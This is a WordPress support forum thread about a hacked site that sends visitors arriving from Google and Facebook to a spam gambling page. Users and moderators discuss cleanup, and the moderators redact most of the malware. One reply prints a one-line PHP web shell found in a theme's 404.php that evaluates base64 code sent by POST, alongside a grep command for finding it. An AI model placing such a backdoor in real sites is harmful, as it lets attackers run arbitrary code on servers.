Support » Fixing WordPress » Site linking to

  • I am having issues with my site redirecting to which looks like a fake search engine, advertising online blackjack. I am experiencing the following specific issues:

    1) When clicking one of my site’s links from Facebook on Firefox and Safari: redirects to the above spam website

    2) When clicking one of my site’s links from Facebook on Google Chrome: redirects to my website with no issue

    3) When searching and clicking the link of my site “Craving Cognition” on Google using any browser, it redirects to above spam website.

    My site is:

    Help would be appreciated!

Viewing 6 replies - 1 through 6 (of 6 total)
  • esmi


    Forum Moderator

    A scan of your site is clean but this does sound like a hack. 🙁

    I think you really need to start working your way through these resources:

    Anything less will probably result in the hacker walking straight back into your site again.

    I’ve got the same problem with my site :

    When searching and clicking the link of my site “” on Google, the under-categories redirect to this website :

    If someone can help me…. (in french would be better !!)

    Moderator bcworkz


    @manugallack, I am not observing the behavior you describe. You must confirm if it is your site that is redirecting or your browser that is redirecting. These selective redirects can be difficult to isolate.

    Or perhaps you fixed the problem? If not, and if it is indeed your site that is redirecting, follow the suggestions posted by esmi above. I am sorry, I am unaware of such resources in French.


    Hi all.

    I had the same issue in my server (, when I accessed directly from address bar there is no problem. But if I found my site on Goole and then clicked on muy address then I was redirected to other site. This is what I found.

    This pice of code was inserted in a few files into the WordPress directory tree:

    [ Moderator note: Please do not post that malware code here. ]

    Now, if you decode this base64 encoded text you will have this:

    [ Redacted ]

    As you can see depending on a few parameters the site is redirected.

    You need to find the modified files and delete this command (this command could be multiple times in a single file). I found this piece of code in these files:

    • wp-config.php
    • wp-settings.php
    • wp-content/plugins/contact-form-7/modules/acceptance.php
    • wp-content/plugins/contact-form-7/modules/quiz.php
    • wp-content/plugins/contact-form-7/modules/select.php
    • wp-content/plugins/contact-form-7/modules/special-mail-tags.php
    • wp-content/plugins/contact-form-7/modules/jetpack.php
    • wp-content/plugins/contact-form-7/modules/akismet.php
    • wp-content/plugins/contact-form-7/modules/captcha.php
    • wp-content/plugins/contact-form-7/modules/text.php
    • wp-content/plugins/contact-form-7/modules/textarea.php
    • wp-content/plugins/contact-form-7/modules/checkbox.php
    • wp-content/plugins/contact-form-7/modules/file.php
    • wp-content/plugins/contact-form-7/modules/submit.php
    • wp-content/plugins/contact-form-7/modules/response.php
    • wp-content/plugins/contact-form-7/modules/flamingo.php

    Plus in file wp-content/themes/picturethis/404.php I found this code:

    <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>

    I don’t know if it is malicious, but I deleted it just in case and my site is working ok.

    How to find this code through your dir tree?

    If you have access to server’s command line you can run this command:

    find ./ -name \*php -type f -exec grep -l 'eval.base64_decode' {} +

    (It will find the code into PHP files)

    From here on you must delete the code as you prefer.

    I hope this is useful for you.

    Hi dmcrae17!

    This is a js based malware. If you will disable the javascript in your browser it will work. You can test it.
    But is not a solution!! The solution is if you will download the latest version of the WordPress and owerride all of your files. Change your ftp and mysql password.
    After the uprade your site should work.

    I hope it was helpful!

    Moderator Andrew Nevins


    The solution isn’t removing the malicious code. That will only resolve the symptom of the hack. The website will still remain hacked.

    Follow the links provided by Esmi to resolve a hack.

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘Site linking to’ is closed to new replies.